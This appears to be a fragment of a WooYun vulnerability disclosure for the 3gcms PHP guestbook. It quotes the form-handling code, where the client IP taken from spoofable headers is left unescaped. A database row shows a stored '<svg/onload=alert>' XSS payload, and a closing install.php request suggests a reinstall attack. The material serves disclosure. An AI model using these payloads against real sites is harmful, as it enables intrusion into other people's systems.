WooYun.org

//先解密js的escape $data['author'] = htmlspecialchars(unescape($_POST['author'])); $data['content'] = htmlspecialchars(trim(unescape($_POST['content']))); $data['title'] = htmlspecialchars(trim(unescape($_POST['title']))); $data['tel'] = htmlspecialchars(trim(unescape($_POST['tel']))); $data['ip'] = get_client_ip(); $data['addtime'] = date('Y-m-d H:i:s'); //处理数据 if($pl->add($data)) { Session::set('posttime', time()); if($config['bookoff'] == 0) { echo '发布成功,留言需要管理员审核!'; exit; } else { echo '发布成功!'; exit; } } else { echo '发布失败!'; exit; }

function get_client_ip() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); }

INSERT INTO `3gcms_guestbook` (`author`,`content`,`title`,`tel`,`ip`,`addtime`) VALUES ('&quot;&gt;&lt;img s','啊是dasdasdasd','&quot;&gt;&lt;img src=x&gt;','&quot;&gt;&lt;img src=x&gt;','\"><svg/onload=alert(/x/)>','2015-02-13 20:57:10')

http://localhost/3gcms/install.php

host=localhost&user=root&password=&dbname=3gcms&install=%E5%BC%80%E5%A7%8B%E5%AE%89%E8%A3%85